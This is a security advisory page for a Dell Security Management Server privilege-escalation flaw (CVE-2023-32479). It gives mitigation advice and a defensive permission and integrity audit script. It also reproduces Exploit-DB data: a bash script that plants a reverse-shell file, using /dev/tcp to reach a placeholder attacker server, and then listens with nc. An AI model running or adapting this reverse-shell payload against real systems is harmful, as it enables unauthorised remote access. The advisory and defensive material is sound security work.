Vendor: Dell Security Management Server
By: Amirhossein Bahramizadeh
CVSS: 6.1 (HIGH)
Type: Privilege Escalation
CWE: 269
Product Name: Dell Security Management Server
Affected Version From: Prior to 11.9.0
Affected Version To: 11.8.9 and below
Patch Exists: NO
Related CWE: CVE-2023-32479
CPE: a:dell:security_management_server
Platforms Tested: Linux
2023

Dell Security Management Server Privilege Escalation

Dell Encryption, Dell Endpoint Security Suite Enterprise, and Dell Security Management Server versions prior to 11.9.0 are vulnerable to privilege escalation. This is due to improper ACLs of the non-default installation directory. An attacker with local access could exploit this by replacing binaries in the installation directory, allowing them to execute arbitrary commands and potentially gain elevated privileges on the system.

Mitigation:

To mitigate this vulnerability, ensure proper file system permissions are set on the installation directory. Regularly monitor the integrity of installed binaries for any unauthorized changes.
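
Both mitigation steps can be checked with a short audit script. This is an added example, not part of the advisory or of Dell's tooling; the function names and the baseline file location are assumptions, and the directory to audit is whatever non-default path the product was installed to.

```sh
#!/bin/sh
# Added defensive example (not from the advisory). Audits an install
# directory for loose permissions and for binaries that differ from a
# trusted SHA-256 baseline. Function names are hypothetical.

# Print entries under $1 that are group/world-writable or not owned by
# the expected owner $2 (default root). Symlinks are skipped because
# their own mode bits are always 777 and carry no meaning.
find_loose_perms() {
    find "$1" ! -type l \( -perm -0002 -o -perm -0020 -o ! -user "${2:-root}" \) -print
}

# Record a SHA-256 baseline of every regular file under $1 into file $2.
# Run this right after a trusted install and store $2 outside $1.
make_baseline() {
    ( cd "$1" && find . -type f -exec sha256sum {} + | sort -k 2 ) > "$2"
}

# Compare $1 with baseline $2 (absolute path). Prints one line per finding
# (MODIFIED_OR_MISSING / ADDED) and returns 1 if anything differs.
check_baseline() {
    cb_tmp=$(mktemp -d) || return 2
    ( cd "$1" && sha256sum -c --quiet "$2" 2>/dev/null ) |
        sed -n 's/^\(.*\): FAILED.*$/MODIFIED_OR_MISSING \1/p' > "$cb_tmp/diff"
    # Files present now but absent from the baseline.
    # Each baseline line is a 64-char hash plus 2 spaces, then the path.
    cut -c67- "$2" | sort > "$cb_tmp/known"
    ( cd "$1" && find . -type f | sort ) | comm -13 "$cb_tmp/known" - |
        sed 's/^/ADDED /' >> "$cb_tmp/diff"
    cat "$cb_tmp/diff"
    if [ -s "$cb_tmp/diff" ]; then cb_rc=1; else cb_rc=0; fi
    rm -rf "$cb_tmp"
    return "$cb_rc"
}
```

Keep the baseline file somewhere unprivileged local users cannot write, and run `check_baseline` from a scheduled job so a replaced binary is reported before a privileged process next executes it.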

Exploit-DB raw data:

# Exploit Title: Dell Security Management Server versions prior to 11.9.0
# Exploit Author: Amirhossein Bahramizadeh
# CVE : CVE-2023-32479
Dell Encryption, Dell Endpoint Security Suite Enterprise, and Dell Security Management Server versions prior to 11.9.0 contain a privilege escalation vulnerability due to improper ACL of the non-default installation directory. A local malicious user could potentially exploit this vulnerability by replacing binaries in the installed directory and taking the reverse shell of the system, leading to Privilege Escalation.

#!/bin/bash

INSTALL_DIR="/opt/dell"

# Check if the installed directory has improper ACLs
if [ -w "$INSTALL_DIR" ]; then
    # Replace a binary in the installed directory with a malicious binary that opens a reverse shell
    echo "#!/bin/bash" > "$INSTALL_DIR/dell-exploit"
    echo "bash -i >& /dev/tcp/your-malicious-server/1234 0>&1" >> "$INSTALL_DIR/dell-exploit"
    chmod +x "$INSTALL_DIR/dell-exploit"

    # Wait for the reverse shell to connect to your malicious server
    nc -lvnp 1234
fi